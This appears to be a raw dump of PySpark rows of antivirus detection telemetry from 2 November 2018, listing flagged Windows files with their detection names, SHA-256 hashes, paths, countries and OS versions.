  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115859-cccdc72c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_da1815cd\\AVSCAN-20181102-115834-C7B67251\\AVSCAN-20181102-115859-CCCDC72C', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:58:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatehwe.exe', filepath='\\\\?\\C:\\UMTool\\UltimateHwe\\UltimateHWE.exe', filesize=5696000, name='HEUR/AGEN.1017632.#M1.#R1'), hash='36ebba073148efd4ea8ae03d7eeeb218b1999939fd9aca32c40c1c10d91bdd5d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gtaquickkeyipe.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\gtaquickkeyipe.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142043-7ccaeabc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-141632-59CA3786\\AVSCAN-20181102-142043-7CCAEABC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vietnam.exe', filepath='D:\\الالعاب1\\حرب فيتنام\\Conflict.Vietnam.EgYuP.CoM.BY.P@WERNMAN\\Vietnam.exe', filesize=5632000, name='W32/Virut.Gen.#M1.#R1'), hash='2127e1194bf4e737e9f838b863a0274a880c98794295b01b8d45ae967a8c73b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T18:32:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120414-0be7b694', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120414-0BE7B694', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055607-f65039bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055607-F65039BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5ace1ed1424594e5959ea96e123af48272c809efbae1f684282889473453cb7b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5ACE1ED1424594E5959EA96E123AF48272C809EFBAE1F684282889473453CB7B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5ace1ed1424594e5959ea96e123af48272c809efbae1f684282889473453cb7b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\FlashMemoryToolkit.exe", filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110233-3b3d9f11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_86c2ba61\\AVSCAN-20181102-110202-383A7774\\AVSCAN-20181102-110233-3B3D9F11', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052844-22bcddc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052844-22BCDDC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061313-59b78abc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061313-59B78ABC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061911-2ee0eba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061911-2EE0EBA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054217-07697009', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054217-07697009', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.748\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.748\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:33:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053217-a207d190', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053217-A207D190', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061426-8551002a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061426-8551002A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055258-8583dc8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055258-8583DC8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051711-85d8a585', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051711-85D8A585', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055614-fa7e84ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055614-FA7E84AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055253-8273f292', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055253-8273F292', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f2faef8f1b03f2f82f15cc0fecb49eecd17130aacc1a1bac7ab253c531666c9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F2FAEF8F1B03F2F82F15CC0FECB49EECD17130AACC1A1BAC7AB253C531666C9', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='6f2faef8f1b03f2f82f15cc0fecb49eecd17130aacc1a1bac7ab253c531666c9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154857-7102419a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154857-7102419A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:52:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='senddmp.exe', filepath='\\\\ts-xelcea\\share\\Acad\\acad2007\\Bin\\acadFeui\\program files\\Root\\senddmp.exe', filesize=512000, name='W32/Stanit.#M1.#R1'), hash='574987fddeabedf5730fb938f4cda915cb67b2028836d4863ed9be4baac6c1e5', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:38:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050726-290ead1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050726-290EAD1E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151506-f7961c43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151506-F7961C43', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051934-dabb63ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051934-DABB63CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055137-54eb57d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055137-54EB57D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061129-1bb47631', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061129-1BB47631', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053516-0ca61b4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053516-0CA61B4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055041-338600bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055041-338600BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062652-420ae314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062652-420AE314', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052418-842a01be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052418-842A01BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051039-9c594c36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051039-9C594C36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062546-1a4fb7b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062546-1A4FB7B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052640-d8bab96d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052640-D8BAB96D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060830-b114818f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060830-B114818F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054952-16763486', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054952-16763486', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052946-47a99329', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052946-47A99329', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062525-0dd14027', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062525-0DD14027', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050423-bbcf5b75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050423-BBCF5B75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061800-047783ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061800-047783BA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060020-8ccd60f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060020-8CCD60F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:19Z'), dt=datetime.date(2018, 11, 2)),
